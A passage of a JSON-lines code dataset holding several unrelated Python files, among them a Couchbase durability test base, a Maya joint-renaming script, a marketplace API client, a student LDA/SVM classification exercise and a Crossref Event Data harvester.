auto-failover\")\n\n # Create default bucket and add rbac user\n self.bucket_util.create_default_bucket(\n replica=self.num_replicas, compression_mode=self.compression_mode,\n bucket_type=self.bucket_type)\n self.bucket_util.add_rbac_user()\n\n self.cluster_util.print_cluster_stats()\n self.bucket = self.bucket_util.buckets[0]\n if not self.skip_init_load:\n if self.target_vbucket and type(self.target_vbucket) is not list:\n self.target_vbucket = [self.target_vbucket]\n\n self.log.info(\"Creating doc_generator..\")\n doc_create = doc_generator(\n self.key,\n 0,\n self.num_items,\n doc_size=self.doc_size,\n doc_type=self.doc_type,\n target_vbucket=self.target_vbucket,\n vbuckets=self.vbuckets)\n self.log.info(\"doc_generator created\")\n\n self.log.info(\"Loading {0} items into bucket\"\n .format(self.num_items))\n task = self.task.async_load_gen_docs(\n self.cluster, self.bucket, doc_create, \"create\", 0,\n batch_size=10, process_concurrency=8,\n replicate_to=self.replicate_to, persist_to=self.persist_to,\n durability=self.durability_level,\n timeout_secs=self.sdk_timeout)\n self.task.jython_task_manager.get_task_result(task)\n\n # Verify initial doc load count\n self.bucket_util._wait_for_stats_all_buckets()\n self.bucket_util.verify_stats_all_buckets(self.num_items)\n\n self.bucket_util.print_bucket_stats()\n self.log.info(\"=== DurabilityBaseTests setup complete ===\")\n\n def tearDown(self):\n # Fail the test case, if the failure is set\n super(DurabilityTestsBase, self).tearDown()\n\n def get_random_node(self):\n rand_node_index = randint(1, self.nodes_init-1)\n return self.cluster.nodes_in_cluster[rand_node_index]\n\n def getTargetNodes(self):\n def select_randam_node(nodes):\n rand_node_index = randint(1, self.nodes_init-1)\n if self.cluster.nodes_in_cluster[rand_node_index] not in node_list:\n nodes.append(self.cluster.nodes_in_cluster[rand_node_index])\n\n node_list = list()\n if len(self.cluster.nodes_in_cluster) > 1:\n # Choose random nodes, if the cluster is not a single node cluster\n while len(node_list) != self.num_nodes_affected:\n select_randam_node(node_list)\n else:\n node_list.append(self.cluster.master)\n return node_list\n","sub_path":"pytests/epengine/durability_base.py","file_name":"durability_base.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"399735768","text":"#-*- coding: utf-8 -*-\nimport maya.cmds as rig\nfrom RIG.selectJoint import SK_selectSkinJnt \n\ndef SK_renameSkinJoint():\n legs = rig.ls('*_ankle_drv_jnt')\n arms = rig.ls('*_wrist_drv_jnt')\n \n for Leg in legs:\n legPrefix = Leg.split('_')[0]\n legPrefixName = legPrefix+'_Leg'\n legPrefixMidName = legPrefix+'Leg' \n upBendJnt = rig.ls(legPrefix+'leg_bend'+'*'+'jnt')\n upLen = len(upBendJnt)\n upBendJnt.insert(0,upBendJnt[0].replace('1_jnt','0_startJnt'))\n for i,Jnt in enumerate(upBendJnt):\n rig.rename(Jnt,legPrefixName+str(i+1)+'_jnt')\n \n downBendJnt = rig.ls(legPrefix+'knee_bend'+'*'+'jnt')\n downLen = len(downBendJnt) \n downBendJnt.insert(0,rig.rename(legPrefixMidName+'_MidJoint_jnt',legPrefixName+'1_jnt'))\n for i,Jnt in enumerate(downBendJnt):\n rig.rename(Jnt,legPrefixName+str(i+upLen+2)+'_jnt')\n \n rig.rename(Leg,legPrefixName+str(downLen+upLen+3)+'_jnt')\n \n for arm in arms:\n armPrefix = arm.split('_')[0]\n armPrefixName = armPrefix+'_Arm'\n armPrefixMidName = armPrefix+'Arm' \n upBendJnt = rig.ls(armPrefix+'upArm_bend'+'*'+'jnt')\n upLen = len(upBendJnt)\n 
upBendJnt.insert(0,upBendJnt[0].replace('1_jnt','0_startJnt'))\n for i,Jnt in enumerate(upBendJnt):\n rig.rename(Jnt,armPrefixName+str(i+1)+'_jnt')\n \n downBendJnt = rig.ls(armPrefix+'elbow_bend'+'*'+'jnt')\n downLen = len(downBendJnt) \n downBendJnt.insert(0,rig.rename(armPrefixMidName+'_MidJoint_jnt',armPrefixName+'1_jnt'))\n for i,Jnt in enumerate(downBendJnt):\n rig.rename(Jnt,armPrefixName+str(i+upLen+2)+'_jnt')\n \n rig.rename(arm,armPrefixName+str(downLen+upLen+3)+'_jnt')\n \n \n# Rename the waist, neck, and head joints\n allSkinJoints = SK_selectSkinJnt()\n rig.select(cl = True)\n \n midJoint = []\n for jnt in allSkinJoints:\n if not ('Rt' in jnt or 'Lf' in jnt):\n midJoint.append(jnt) \n \n waistJoint = []\n for jnt in midJoint:\n if('waist' in jnt):\n waistJoint.append(jnt) \n \n waistJoint.insert(0,'hip_jnt')\n waistJoint.append('chest1_jnt')\n \n for i,jnt in enumerate(waistJoint):\n rig.rename(jnt,'spline'+str(i+1)+'_jnt')\n \n rig.rename('lower_jaw_jnt','head_jawLow_jnt')\n rig.rename('upper_jaw_jnt','head_jawUp_jnt')\n ","sub_path":"OLD/idmt/maya/RIG/commonly/renameBindJoint.py","file_name":"renameBindJoint.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"59198585","text":"from .base import BaseAPIClient, logger\nfrom .errors import HTTPError\n\n\nclass DataAPIClient(BaseAPIClient):\n def init_app(self, app):\n self.base_url = app.config['DM_DATA_API_URL']\n self.auth_token = app.config['DM_DATA_API_AUTH_TOKEN']\n\n # Audit Events\n\n def find_audit_events(\n self,\n audit_type=None,\n audit_date=None,\n page=None,\n acknowledged=None):\n\n params = {}\n if audit_type:\n params[\"audit-type\"] = audit_type\n if page is not None:\n params['page'] = page\n if audit_date is not None:\n params['audit-date'] = audit_date\n if acknowledged is not None:\n params['acknowledged'] = acknowledged\n\n return self._get(\n \"/audit-events\",\n params\n )\n\n def acknowledge_audit_event(self, audit_event_id, user):\n return self._post(\n \"/audit-events/{}/acknowledge\".format(audit_event_id),\n data={\n \"update_details\": {\n \"updated_by\": user\n }\n })\n\n # Suppliers\n\n def find_suppliers(self, prefix=None, page=None, framework=None):\n params = {}\n if prefix:\n params[\"prefix\"] = prefix\n if page is not None:\n params['page'] = page\n if framework is not None:\n params['framework'] = framework\n\n return self._get(\n \"/suppliers\",\n params=params\n )\n\n def get_supplier(self, supplier_id):\n return self._get(\n \"/suppliers/{}\".format(supplier_id)\n )\n\n def create_supplier(self, supplier_id, supplier):\n return self._put(\n \"/suppliers/{}\".format(supplier_id),\n data={\"suppliers\": supplier},\n )\n\n def update_supplier(self, supplier_id, supplier, user):\n return self._post(\n \"/suppliers/{}\".format(supplier_id),\n data={\n \"suppliers\": supplier,\n \"updated_by\": user,\n },\n )\n\n def update_contact_information(self, supplier_id, contact_id,\n contact, user):\n return self._post(\n \"/suppliers/{}/contact-information/{}\".format(\n supplier_id, contact_id),\n data={\n \"contactInformation\": contact,\n \"updated_by\": user,\n },\n )\n\n def get_selection_answers(self, supplier_id, framework_slug):\n return self._get(\n \"/suppliers/{}/selection-answers/{}\".format(\n supplier_id, framework_slug))\n\n def answer_selection_questions(self, supplier_id, framework_slug,\n answers, user):\n return self._put(\n \"/suppliers/{}/selection-answers/{}\".format(\n supplier_id, framework_slug),\n 
data={\n \"updated_by\": user,\n \"selectionAnswers\": {\n \"questionAnswers\": answers\n }\n })\n\n # Users\n\n def create_user(self, user):\n return self._post(\n \"/users\",\n data={\n \"users\": user,\n })\n\n def get_user(self, user_id=None, email_address=None):\n if user_id is not None and email_address is not None:\n raise ValueError(\n \"Cannot get user by both user_id and email_address\")\n elif user_id is not None:\n url = \"{}/users/{}\".format(self.base_url, user_id)\n params = {}\n elif email_address is not None:\n url = \"{}/users\".format(self.base_url)\n params = {\"email\": email_address}\n else:\n raise ValueError(\"Either user_id or email_address must be set\")\n\n try:\n return self._get(url, params=params)\n except HTTPError as e:\n if e.status_code != 404:\n raise\n return None\n\n def authenticate_user(self, email_address, password, supplier=True):\n try:\n response = self._post(\n '/users/auth',\n data={\n \"authUsers\": {\n \"emailAddress\": email_address,\n \"password\": password,\n }\n })\n if not supplier or \"supplier\" in response['users']:\n return response\n except HTTPError as e:\n if e.status_code not in [400, 403, 404]:\n raise\n return None\n\n def update_user_password(self, user_id, new_password):\n try:\n self._post(\n '/users/{}'.format(user_id),\n data={\"users\": {\"password\": new_password}}\n )\n\n logger.info(\"Updated password for user %s\", user_id)\n return True\n except HTTPError as e:\n logger.info(\"Password update failed for user %s: %s\",\n user_id, e.status_code)\n return False\n\n # Services\n\n def find_draft_services(\n self, supplier_id, service_id=None, framework=None):\n\n url = \"/draft-services?supplier_id={}\".format(supplier_id)\n\n if service_id:\n url = \"{}&service_id={}\".format(url, service_id)\n\n if framework:\n url = \"{}&framework={}\".format(url, framework)\n\n return self._get(url)\n\n def get_draft_service(self, draft_id):\n return self._get(\n \"/draft-services/{}\".format(draft_id)\n )\n\n def delete_draft_service(self, draft_id, user):\n return self._delete(\n \"/draft-services/{}\".format(draft_id),\n data={\n \"update_details\": {\n \"updated_by\": user,\n \"update_reason\": \"deprecated\",\n },\n })\n\n def copy_draft_service_from_existing_service(self, service_id, user):\n return self._put(\n \"/draft-services/copy-from/{}\".format(service_id),\n data={\n \"update_details\": {\n \"updated_by\": user,\n \"update_reason\": \"deprecated\",\n },\n })\n\n def update_draft_service(self, draft_id, service, user):\n return self._post(\n \"/draft-services/{}\".format(draft_id),\n data={\n \"update_details\": {\n \"updated_by\": user,\n \"update_reason\": \"deprecated\",\n },\n \"services\": service,\n })\n\n def publish_draft_service(self, draft_id, user):\n return self._post(\n \"/draft-services/{}/publish\".format(draft_id),\n data={\n \"update_details\": {\n \"updated_by\": user,\n \"update_reason\": \"deprecated\",\n },\n })\n\n def create_new_draft_service(self, framework_slug, supplier_id, user, lot):\n return self._post(\n \"/draft-services/{}/create\".format(framework_slug),\n data={\n \"update_details\": {\n \"updated_by\": user\n },\n \"services\": {\n \"supplierId\": supplier_id,\n \"lot\": lot\n }\n\n })\n\n def get_archived_service(self, archived_service_id):\n return self._get(\"/archived-services/{}\".format(archived_service_id))\n\n def get_service(self, service_id):\n try:\n return self._get(\n \"/services/{}\".format(service_id))\n except HTTPError as e:\n if e.status_code != 404:\n raise\n return 
None\n\n def find_services(self, supplier_id=None, page=None):\n params = {}\n if supplier_id is not None:\n params['supplier_id'] = supplier_id\n if page is not None:\n params['page'] = page\n\n return self._get(\n self.base_url + \"/services\",\n params=params)\n\n def import_service(self, service_id, service, user, reason):\n return self._put(\n \"/services/{}\".format(service_id),\n data={\n \"update_details\": {\n \"updated_by\": user,\n \"update_reason\": reason,\n },\n \"services\": service,\n })\n\n def update_service(self, service_id, service, user, reason):\n return self._post(\n \"/services/{}\".format(service_id),\n data={\n \"update_details\": {\n \"updated_by\": user,\n \"update_reason\": reason,\n },\n \"services\": service,\n })\n\n def update_service_status(self, service_id, status, user, reason):\n return self._post(\n \"/services/{}/status/{}\".format(service_id, status),\n data={\n \"update_details\": {\n \"updated_by\": user,\n \"update_reason\": reason,\n },\n })\n","sub_path":"dmutils/apiclient/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":9034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"309134030","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.lines as mlines\nimport matplotlib.transforms as mtransforms\nimport sklearn as sk\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\n\n\n\n##### I\\ Data generation #####\n\nnp.random.seed(123)\n\nmu0 = (0,0)\nmu1 = (3,2)\nsigma = [[1,1/2],[1/2,1]]\n\ndef getData(mu0, mu1, sigma0, sigma1, nbObs0, nbObs1):\n labels = np.concatenate((np.repeat(0,nbObs0) , np.repeat(1,nbObs1)), axis = None)\n c0Data = np.random.multivariate_normal(mu0, sigma0, nbObs0)\n c1Data = np.random.multivariate_normal(mu1, sigma1, nbObs1)\n cData = np.concatenate((c0Data, c1Data), axis = 0)\n return([cData, labels])\n\nmu0, mu1, sigma0, sigma1= mu0, mu1, sigma, sigma\n\ntrainData, trainLabel = getData(mu0, mu1, sigma0, sigma1, 10, 10)\ntestData, testLabel = getData(mu0, mu1, sigma0, sigma1, 1000, 1000)\n\n#plt.scatter(testData[:,0], testData[:,1], c = testLabel)\n#plt.show()\n\n##### II\\ Linear Discriminant Analysis #####\n\n#Qu1 : \n\ndef muhat(classId, data, labelList):\n dt = data[labelList == classId]\n res = np.sum(dt, axis=0)/len(dt)\n return(res)\n\ndef sigmahat(classId, data, labelList):\n mu = muhat(classId, data, labelList)\n dt = data[labelList == classId]\n matrix = [np.dot(np.transpose(np.array([x]) - mu), np.array([x]) - mu) for x in dt]\n return (sum(matrix)/len(dt))\n\ndef pihat(classId, data, labelList):\n\tdt = data [labelList == classId]\n\treturn len(dt)/len(data)\n\ndef weighted_Sigma_Hat (sigma0, sigma1, nbObs0, nbObs1) :\n return np.dot((np.dot(nbObs0,sigma0) + np.dot(nbObs1,sigma1)), 1/(nbObs0+nbObs1))\n\ndef LDA(x):\n #means\n mu0 = muhat(0, trainData, trainLabel)\n mu1 = muhat(1, trainData, trainLabel)\n #covariances\n sigma0 = sigmahat(0, trainData, trainLabel)\n sigma1 = sigmahat(1, trainData, trainLabel)\n \n #weighted covariance\n sigma = weighted_Sigma_Hat(sigma0, sigma1, len(trainLabel == 0),len(trainLabel == 1))\n \n #class proportions\n pi0 = pihat(0, trainData, trainLabel)\n pi1 = pihat(1, trainData, trainLabel)\n\n #the LDA discriminant uses the natural logarithm of the priors\n delta0 = (np.dot(np.transpose(x), np.dot(np.linalg.inv(sigma), mu0))) - 0.5 * (np.dot(np.transpose(mu0),np.dot(np.linalg.inv(sigma), mu0))) + np.log(pi0)\n delta1 = (np.dot(np.transpose(x),np.dot(np.linalg.inv(sigma), mu1))) - 0.5 * (np.dot(np.transpose(mu1),np.dot(np.linalg.inv(sigma), mu1))) + np.log(pi1)\n \n #decision\n if (delta1 > delta0) :\n return 1\n else :\n return 0\n
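\n# Added illustration (not part of the original TP): classify one point with the\n# hand-rolled LDA; like classificationRate below, it passes a column vector.\nprint(\"LDA prediction for (2.5, 1.5):\", LDA(np.transpose(np.asmatrix([2.5, 1.5]))))\n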
\n \ndef classificationRate(data, labelList):\n rightPrediction = 0\n\n for i in range(0, len(data)) :\n if(LDA (np.transpose(np.asmatrix(data[i]))) == labelList[i]) :\n rightPrediction += 1\n \n rate = rightPrediction/len(data)\n return rate\n\ndef classificationRateUsingSklearn(data, labelList) :\n rightPrediction = 0\n \n clf = LinearDiscriminantAnalysis()\n clf.fit(trainData, trainLabel).score(data, labelList)\n\n for i in range(0, len(data)) :\n if(clf.predict(np.asmatrix(data[i])) == labelList[i]) :\n rightPrediction += 1\n\n rate = rightPrediction/len(data)\n return rate\n\nprint(\"LDA training rate: \",classificationRate(trainData, trainLabel))\nprint(\"LDA test rate: \", classificationRate(testData, testLabel))\nprint(\"LDA SKLEARN training rate: \", classificationRateUsingSklearn(trainData, trainLabel))\nprint(\"LDA SKLEARN test rate: \", classificationRateUsingSklearn(testData, testLabel))\n\n##############################################################################\n#Qu2 : \n\n#Add the point (-10, -10)\n\ntrainData[0] = [-10] #numpy broadcasts the single value to both coordinates\n\n#Recompute the parameters\n\n#means\nmuhat0 = muhat(0, trainData, trainLabel)\n#print(muhat0)\n\n#covariance\nsigma0 = sigmahat(0, trainData, trainLabel)\n#print(sigma0)\n\n#weighted covariance\nsigma = weighted_Sigma_Hat(sigma0, sigma1, len(trainLabel == 0),len(trainLabel == 1))\n#print(sigma)\nprint(\"LDA training rate after adding the point (-10, -10): \",classificationRate(trainData, trainLabel))\nprint(\"LDA test rate with the point (-10, -10): \", classificationRate(testData, testLabel))\n\n#Comment: \n\n#The outlier (-10,-10) skews the LDA parameters, which lowers the performance and\n#effectiveness of our LDA method (LDA is sensitive to outliers)\n##############################################################################\n\n#Qu3 Draw the decision boundary \n\n\ndef decisionBoundary(data, labelList):\n #means\n mu0 = muhat(0, data, labelList)\n mu1 = muhat(1, data, labelList)\n #proportion of classes\n pi0 = pihat(0, data, labelList)\n pi1 = pihat(1, data, labelList)\n #covariance\n sigma0 = sigmahat(0, data, labelList)\n sigma1 = sigmahat(1, data, labelList)\n #weighted covariance \n sigma = weighted_Sigma_Hat(sigma0, sigma1, 10,10)\n #x coefficient\n w = np.dot(np.linalg.inv(sigma),(mu0-mu1))\n #w coordinates \n alpha = w[0]\n beta = w[1]\n #b \n b = -0.5 * np.dot((mu0-mu1), np.dot(np.linalg.inv(sigma),(mu0+mu1))) + np.log(pi0/pi1)\n #x coordinates \n return [[0,-b/beta],[-b/alpha, 0]]\n\ndef drawDecisionBoundary(data, labelList) :\n p1,p2 = decisionBoundary(trainData, trainLabel)\n x_list = [p1[0], p2[0]]\n y_list = [p1[1], p2[1]]\n x_list2 = [p2[0], 2*p2[0] - p1[0]]\n y_list2 = [p2[1], 2*p2[1] - p1[1]]\n fig, ax = plt.subplots()\n ax.scatter(data[:,0], data[:,1], c = labelList)\n line = mlines.Line2D(x_list, y_list, color='black')\n line2 = mlines.Line2D(x_list2, y_list2, color='black')\n ax.add_line(line)\n ax.add_line(line2)\n plt.show()\n \n#Case without the outlier \ntrainData[0] = [0.44151096, 1.4388564] \ndecisionBoundary(trainData, trainLabel)\ndrawDecisionBoundary(testData, testLabel)\n#Case with the outlier \ntrainData[0] = [-10]\ndecisionBoundary(trainData, trainLabel)\ndrawDecisionBoundary(testData, testLabel)\n\n#Comment: \n#The outlier completely changes the direction of the decision boundary.\n#We can see that the decision boundary computed with the outlier is \n#not good once the test data are added (see the figure)\n
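\n# Added illustration (not part of the original TP): the two points returned by\n# decisionBoundary are the axis intercepts of the separating line.\nprint(\"Boundary intercepts (on x=0 and y=0):\", decisionBoundary(trainData, trainLabel))\n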
\n\n##############################################################################@\n#Qu4\n\n### The performance of linear discriminant analysis decreases when:\n## - the number of observations in the training data is small\n## - the covariance matrices of the classes are very different\n### This method generalizes LDA for lambda = 1 (and sigma1=sigma2)\n\n\n###################################\n\n\n\n\n\n#print(classificationRateBis(testData, testLabel))\n\n##############################################################################@\n#Qu5\ndef variantWeightedSigmaHat (sigma0, sigma1, nbObs0, nbObs1, param) :\n return np.dot(param, np.dot((np.dot(nbObs0,sigma0) + np.dot(nbObs1,sigma1)), 1/(nbObs0+nbObs1))) + np.dot((1-param), np.identity(2))\n\n#\ndef variantLDA(x, param):\n #means\n mu0 = muhat(0, trainData, trainLabel)\n mu1 = muhat(1, trainData, trainLabel)\n #covariances\n sigma0 = sigmahat(0, trainData, trainLabel)\n sigma1 = sigmahat(1, trainData, trainLabel)\n \n #weighted covariance\n sigma = variantWeightedSigmaHat(sigma0, sigma1, len(trainLabel == 0),len(trainLabel == 1), param)\n \n #class proportions\n pi0 = pihat(0, trainData, trainLabel)\n pi1 = pihat(1, trainData, trainLabel)\n\n delta0 = (np.dot(np.transpose(x), np.dot(np.linalg.inv(sigma), mu0))) - 0.5 * (np.dot(np.transpose(mu0),np.dot(np.linalg.inv(sigma), mu0))) + np.log(pi0)\n delta1 = (np.dot(np.transpose(x),np.dot(np.linalg.inv(sigma), mu1))) - 0.5 * (np.dot(np.transpose(mu1),np.dot(np.linalg.inv(sigma), mu1))) + np.log(pi1)\n \n #decision\n if (delta1 > delta0) :\n return 1\n else :\n return 0\n\ndef classificationRateBis2(data, labelList, param):\n rightPrediction = 0\n\n for i in range(0, len(data)) :\n if(variantLDA(np.transpose(np.asmatrix(data[i])), param) == labelList[i]) :\n rightPrediction += 1\n \n rate = rightPrediction/len(data)\n return rate\n\n#print(classificationRateBis2(testData, testLabel, 0.5))\n#print(classificationRateBis2(testData, testLabel, 1)) ## classic LDA\n\n\ndef variantLDAGraph():\n graph = []\n for i in range (0, 101) : \n graph.append([i*0.01, classificationRateBis2(testData, testLabel, i*0.01)])\n numpyGraph = np.array(graph)\n plt.scatter(numpyGraph[:,0], numpyGraph[:,1])\n plt.show()\n\n#variantLDAGraph()\n##############################################################################@\n#Qu 6\ndef crossValidation(dataList, labelList) :\n #teta_i : lambda between 0 and 1\n teta = np.linspace(0,1,10)\n tetaClassificationRate = np.zeros(len(teta)) #zeros, so the running sums start well defined\n \n for i in range (0, dataList.shape[0]) :\n test_data = dataList[i]\n test_label = [labelList[i]]\n train_data = np.delete(dataList, i, axis = 0)\n label_data = np.delete(labelList, i)\n for teta_I in range (0, len(teta)) :\n #score the held-out sample with the regularized variant for this teta\n tetaClassificationRate[teta_I] = tetaClassificationRate[teta_I] + classificationRateBis2(np.asmatrix(test_data), test_label, teta[teta_I])\n \n tetaClassificationRate = tetaClassificationRate/dataList.shape[0]\n print(\"Correct classification rate for teta = \", teta, \" rate: \", tetaClassificationRate)\n 
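\n# Added note (not part of the original TP): with this 20-point training set the\n# leave-one-out loop above stays cheap; note it still scores against models\n# fitted on the global trainData, as in the original helpers.\n# crossValidation(trainData, trainLabel)\n 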
\n######## III/ YOUR TURN ########################\n\n#Qu1 : \n#1st classifier: SVM\n#The idea is roughly the same as for LDA: for each new input, we must be able to predict\n#whether the new point belongs to class 0 or class 1.\n#We choose a boundary that separates the categories of our points.\n#The SVM is a very effective classification method when little training data is available. \n#2nd classifier: Random Forest\n\nfrom sklearn.datasets.samples_generator import make_blobs, make_moons\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import svm\n\n##############################################################################@\n\n#Qu2 :\n#generate dataset\n\ntrainData, trainLabel = make_moons(n_samples=100)\ntestData, testLabel = make_blobs(n_samples=100)\n\n#Performing LDA\nclfLDA = LinearDiscriminantAnalysis()\nprint(\"LDA performance train data : \",clfLDA.fit(trainData, trainLabel).score(trainData, trainLabel))\nprint(\"LDA performance test data: \",clfLDA.fit(trainData, trainLabel).score(testData, testLabel))\n\n#Performing SVM\nclfSVM = svm.SVC(gamma='scale')\nprint(\"SVM performance train data : \",clfSVM.fit(trainData, trainLabel).score(trainData, trainLabel))\nprint(\"SVM performance test data : \",clfSVM.fit(trainData, trainLabel).score(testData, testLabel))\n\n#Performing The Random Forest Algorithm\nclfRFC = RandomForestClassifier(n_estimators=10, max_depth=2,random_state=0)\nprint(\"Random Forest Class. performance train data : \",clfRFC.fit(trainData, trainLabel).score(trainData, trainLabel))\nprint(\"Random Forest Class. performance test data : \",clfRFC.fit(trainData, trainLabel).score(testData, testLabel))\n\n#We can see that the SVM and the Random Forest remain very effective, unlike LDA,\n#when only a little training data is available\n
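\n# Added illustration (not part of the original TP): k-fold cross-validation gives\n# a steadier performance estimate than a single train/test split.\nfrom sklearn.model_selection import cross_val_score\nprint(\"SVM 5-fold CV accuracy:\", cross_val_score(clfSVM, trainData, trainLabel, cv=5).mean())\n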
\n\n##############################################################################@\n\n\n#Qu 3 : \n\n#Our \".txt\" dataset contains 15 observations of a crane that moves containers\n#from one point to another (2 predictive attributes: Speed, Angle + target attribute: Power).\n#Speed: travel speed of the container: low, medium and high \n#(low: 1, 2, 3; medium: 6, 7, 8; high: 9, 10). \n#Angle: large negative angle, small negative angle, zero angle, small positive angle and large positive angle. \n#Power: low, medium and high (low: 0.3; medium: 0.5; high: 0.7). \n#The exercise on this dataset is to predict \n#the power of the crane as a function of the speed and the angle, in order to avoid an accident \n#potentially caused by the speed\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\n#dataset as a table: \n\ngrue_conteneur = pd.DataFrame(pd.read_csv(\"grue_conteneur.csv\"), columns = [\"Speed\", \"Angle\", \"Power\"])\ngrue_conteneur.head(15)\n\n##############################################################################\n\n\n\n\n#Qu 4 :\ndata = grue_conteneur[[\"Speed\", \"Angle\"]]\nlabel = grue_conteneur[\"Power\"]\n\ntrainData, testData, trainLabel, testLabel = train_test_split(data, label, test_size = 7) \n\n#Performing LDA\nclfLDA = LinearDiscriminantAnalysis()\nprint(\"LDA grue_conteneur train data : \",clfLDA.fit(trainData, trainLabel).score(trainData, trainLabel))\nprint(\"LDA grue_conteneur test data: \",clfLDA.fit(trainData, trainLabel).score(testData, testLabel))\n\n#Performing SVM\nclfSVM = svm.SVC(gamma='scale')\nprint(\"SVM grue_conteneur train data : \",clfSVM.fit(trainData, trainLabel).score(trainData, trainLabel))\nprint(\"SVM grue_conteneur test data : \",clfSVM.fit(trainData, trainLabel).score(testData, testLabel))\n\n#Performing The Random Forest Algorithm\nclfRFC = RandomForestClassifier(n_estimators=10, max_depth=2,random_state=0)\nprint(\"Random Forest Class. grue_conteneur train data : \",clfRFC.fit(trainData, trainLabel).score(trainData, trainLabel))\nprint(\"Random Forest Class. grue_conteneur test data : \",clfRFC.fit(trainData, trainLabel).score(testData, testLabel))\n\n#Cross Validation \n\n\n\n\n\n\n\n#Comparison\n\n","sub_path":"TP-ML.py","file_name":"TP-ML.py","file_ext":"py","file_size_in_byte":13421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"118116697","text":"# CTI - 110\r\n# P3T1 - Areas of Rectangles\r\n# Charles Gaffney\r\n# 9/19/19\r\n#\r\n\r\n\r\n# Pseudocode\r\n# Ask the user for the lengths and widths of the two rectangles\r\n# Calculate the areas for both rectangles and store them in separate variables\r\n# If one area is bigger than the other, display that that one is bigger. 
Else display both are equal.\r\n\r\n# Asks the user for the lengths and widths of the rectangles and stores them in floats.\r\nrect1_length = float(input(\"Enter the length of the first rectangle: \"))\r\nrect1_width = float(input(\"Enter the width of the first rectangle: \"))\r\nrect2_length = float(input(\"Enter the length of the second rectangle: \"))\r\nrect2_width = float(input(\"Enter the width of the second rectangle: \"))\r\n\r\n# Calculates and displays the areas\r\nrect1_area = rect1_length * rect1_width\r\nrect2_area = rect2_length * rect2_width\r\nprint(\"The first rectangle has an area of \" + format(rect1_area, ','))\r\nprint(\"The second rectangle has an area of \" + format(rect2_area, ','))\r\n\r\n# Checks to see if one area is greater than the other or if both areas are equal\r\n# Displays the result\r\nif rect1_area > rect2_area:\r\n print(\"The first rectangle's area is greater than the second rectangle's area.\")\r\nelif rect2_area > rect1_area:\r\n print(\"The second rectangle's area is greater than the first rectangle's area.\")\r\nelse:\r\n print(\"The areas of the rectangles are equal.\")\r\n","sub_path":"P3T1_AreasOfRectangles_CharlesGaffney.py","file_name":"P3T1_AreasOfRectangles_CharlesGaffney.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"374478961","text":"'''\nCreated on 2016. 10. 1.\n\n@author: Administrator\n'''\n\n# Encapsulation: do not read/write member data directly; go through functions instead, to preserve data integrity...\n# property: keeps the encapsulation principle while staying convenient to use.\n\n\nclass Calendar:\n month=0\n def setMonth(self,m):\n if m<1 or m>12:\n print('wrong month')\n else:\n self.month = m \n \n def getMonth(self):\n return self.month\n \n \n
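# Added sketch (not in the original file): the property-based version that the\n# comment above alludes to; an assignment like cal.month = 13 then goes through the setter.\nclass Calendar2:\n def __init__(self):\n self._month = 0\n @property\n def month(self):\n return self._month\n @month.setter\n def month(self, m):\n if m<1 or m>12:\n print('wrong month')\n else:\n self._month = m\n \n \n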
dataset.has_key(collection,\"captured\")\n\n cursor = ''\n count = 0\n while cursor is not None:\n if collected:\n date,err = dataset.read(collection,\"captured\")\n if err != '':\n print('error on read: '+err)\n date = date['captured']\n print(date)\n url = base_url + '&from-collected-date=' +date+ '&cursor='+cursor\n else:\n url = base_url + '&cursor='+cursor\n print(url)\n r = requests.get(url)\n records = r.json()\n if records['status'] == 'failed':\n print(records)\n break\n for rec in records['message']['events']:\n #Save results in dataset\n print(count,rec['id'])\n count = count + 1 #Just for prettiness\n err = dataset.create(collection,rec['id'],rec)\n if err != '':\n print(\"Error in saving record: \"+err)\n\n if cursor == records['message']['next-cursor']: \n # Catches bug where we get the same cursor back at end of results\n break\n cursor = records['message']['next-cursor']\n\n if collected:\n \n date,err = dataset.read(collection,\"captured\")\n if err != '':\n print(\"Error in reading date: \"+err)\n date = date['captured']\n\n #Check Deleted\n cursor = ''\n while cursor is not None:\n del_url = 'https://api.eventdata.crossref.org/v1/events/deleted?mailto=data@caltech.edu&source=crossref'\n full = del_url + '&from-collected-date=' +date+ '&cursor='+cursor\n r = requests.get(full)\n records = r.json() #refresh the response; the original reused the stale records object here\n for rec in records['message']['events']:\n #Delete results in dataset\n print(\"Deleted: \",rec['id'])\n err = dataset.delete(collection,rec['id'])\n if err !=\"\":\n print(f\"Unexpected error on delete: {err}\")\n cursor = records['message']['next-cursor']\n\n #Check Edited\n cursor = ''\n while cursor is not None:\n del_url = 'https://api.eventdata.crossref.org/v1/events/edited?mailto=data@caltech.edu&source=crossref'\n full = del_url + '&from-collected-date=' +date+ '&cursor='+cursor\n r = requests.get(full)\n records = r.json() #refresh the response here as well\n for rec in records['message']['events']:\n #Update results in dataset\n print(\"Update: \",rec['id'])\n err = dataset.update(collection,rec['id'],rec)\n if err !=\"\":\n print(f\"Unexpected error on write: {err}\")\n cursor = records['message']['next-cursor']\n\n date = datetime.date.today().isoformat()\n record = {\"captured\":date}\n if dataset.has_key(collection,\"captured\"):\n err = dataset.update(collection,'captured',record)\n if err !=\"\":\n print(f\"Unexpected error on update: {err}\")\n else:\n err = dataset.create(collection,'captured',record)\n if err !=\"\":\n print(f\"Unexpected error on create: {err}\")\n definition = os.path.join(os.path.dirname(__file__),'crossref_refs.json')\n err = dataset.indexer(collection,collection+'.bleve',definition)\n if err !=\"\":\n print(f\"Unexpected error on index: {err}\")\n\n","sub_path":"ames/harvesters/crossref_refs.py","file_name":"crossref_refs.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"149474453","text":"#!/Library/Frameworks/Python.framework/Versions/3.5/bin/python3\nimport json\nimport sys\nimport re\n\ndict_p = 